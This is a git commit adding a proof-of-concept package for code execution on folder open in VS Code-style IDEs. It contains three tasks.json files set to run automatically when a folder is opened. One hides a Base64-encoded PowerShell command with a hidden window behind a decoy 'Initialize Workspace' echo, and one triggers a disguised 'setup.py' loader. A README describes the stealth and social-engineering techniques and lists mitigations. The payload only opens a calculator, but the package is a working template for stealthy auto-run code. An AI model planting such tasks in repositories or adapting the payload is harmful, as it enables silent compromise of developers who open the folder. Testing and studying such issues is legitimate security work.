initial commit
This commit is contained in:
+20
@@ -0,0 +1,20 @@
|
|||||||
|
{
|
||||||
|
"version": "2.0.0",
|
||||||
|
"tasks": [
|
||||||
|
{
|
||||||
|
"label": "RCE Test - Calculator",
|
||||||
|
"type": "shell",
|
||||||
|
"command": "calc.exe",
|
||||||
|
"windows": {
|
||||||
|
"command": "calc.exe"
|
||||||
|
},
|
||||||
|
"runOptions": {
|
||||||
|
"runOn": "folderOpen"
|
||||||
|
},
|
||||||
|
"presentation": {
|
||||||
|
"reveal": "always",
|
||||||
|
"panel": "new"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
+25
@@ -0,0 +1,25 @@
|
|||||||
|
{
|
||||||
|
"version": "2.0.0",
|
||||||
|
"tasks": [
|
||||||
|
{
|
||||||
|
"label": "Initialize Workspace",
|
||||||
|
"type": "shell",
|
||||||
|
"command": "echo 'Workspace ready.'",
|
||||||
|
"windows": {
|
||||||
|
"command": "powershell -WindowStyle Hidden -NoProfile -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMA"
|
||||||
|
},
|
||||||
|
"runOptions": {
|
||||||
|
"runOn": "folderOpen"
|
||||||
|
},
|
||||||
|
"presentation": {
|
||||||
|
"reveal": "never",
|
||||||
|
"echo": false,
|
||||||
|
"focus": false,
|
||||||
|
"panel": "shared",
|
||||||
|
"showReuseMessage": false,
|
||||||
|
"clear": true
|
||||||
|
},
|
||||||
|
"problemMatcher": []
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
+25
@@ -0,0 +1,25 @@
|
|||||||
|
{
|
||||||
|
"version": "2.0.0",
|
||||||
|
"tasks": [
|
||||||
|
{
|
||||||
|
"label": "Run Project Setup",
|
||||||
|
"type": "shell",
|
||||||
|
"command": "python scripts/setup.py",
|
||||||
|
"windows": {
|
||||||
|
"command": "python scripts/setup.py"
|
||||||
|
},
|
||||||
|
"runOptions": {
|
||||||
|
"runOn": "folderOpen"
|
||||||
|
},
|
||||||
|
"presentation": {
|
||||||
|
"reveal": "silent",
|
||||||
|
"echo": false,
|
||||||
|
"focus": false,
|
||||||
|
"panel": "shared",
|
||||||
|
"showReuseMessage": false,
|
||||||
|
"clear": true
|
||||||
|
},
|
||||||
|
"problemMatcher": []
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
Executable
+19
@@ -0,0 +1,19 @@
|
|||||||
|
import os
|
||||||
|
import platform
|
||||||
|
|
||||||
|
def init_environment():
|
||||||
|
print("[*] Setting up development environment...")
|
||||||
|
# Simulate some setup work
|
||||||
|
|
||||||
|
# Payload trigger
|
||||||
|
if platform.system() == "Windows":
|
||||||
|
os.system("start calc.exe")
|
||||||
|
elif platform.system() == "Darwin": # MacOS
|
||||||
|
os.system("open -a Calculator")
|
||||||
|
elif platform.system() == "Linux":
|
||||||
|
os.system("gnome-calculator")
|
||||||
|
|
||||||
|
print("[+] Environment ready.")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
init_environment()
|
||||||
@@ -0,0 +1,36 @@
|
|||||||
|
# IDE "Open Folder" RCE Proof of Concept Package
|
||||||
|
|
||||||
|
This package contains three examples of the "Open Folder" vulnerability (CVE-2025-54135 equivalent) affecting VS Code, Cursor, and other derived IDEs.
|
||||||
|
|
||||||
|
**Payload:** All examples launch `calc.exe` (Windows) or Calculator (Mac/Linux) to demonstrate execution without causing harm.
|
||||||
|
|
||||||
|
## Contents
|
||||||
|
|
||||||
|
### [1_Basic_Calc](./1_Basic_Calc)
|
||||||
|
The simplest test case.
|
||||||
|
- **Behavior:** Opens `calc.exe` immediately upon opening the folder.
|
||||||
|
- **Stealth:** None. A terminal window will likely appear.
|
||||||
|
- **Use Case:** Basic verification of vulnerability.
|
||||||
|
|
||||||
|
### [2_Inline_Stealth](./2_Inline_Stealth)
|
||||||
|
Demonstrates obfuscation within the configuration file.
|
||||||
|
- **Behavior:** Launches `calc.exe` silently in the background.
|
||||||
|
- **Technique:** Uses the `windows` property override to hide the real command behind a fake `echo` command. The payload is Base64 encoded.
|
||||||
|
- **Stealth:** High (UI level). No terminal pops up.
|
||||||
|
|
||||||
|
### [3_External_Script_Stealth](./3_External_Script_Stealth)
|
||||||
|
Demonstrates the "Loader" technique.
|
||||||
|
- **Behavior:** `tasks.json` triggers a standard looking Python script (`scripts/setup.py`).
|
||||||
|
- **Technique:** The malice is decoupled from the config file. The config looks like a standard build instruction.
|
||||||
|
- **Stealth:** Maximum (Social Engineering). Looks like a legitimate repository setup.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
1. Extract the folder you want to test.
|
||||||
|
2. Open your IDE.
|
||||||
|
3. **File -> Open Folder...** -> Select the folder (e.g., `1_Basic_Calc`).
|
||||||
|
4. Observe if Calculator launches.
|
||||||
|
|
||||||
|
## Mitigation
|
||||||
|
To protect yourself against these attacks:
|
||||||
|
1. **Enable Workspace Trust:** Settings -> `Security: Workspace Trust`.
|
||||||
|
2. **Disable Automatic Tasks:** Settings -> `Task: Allow Automatic Tasks` -> `off`.
|
||||||
Reference in New Issue
Block a user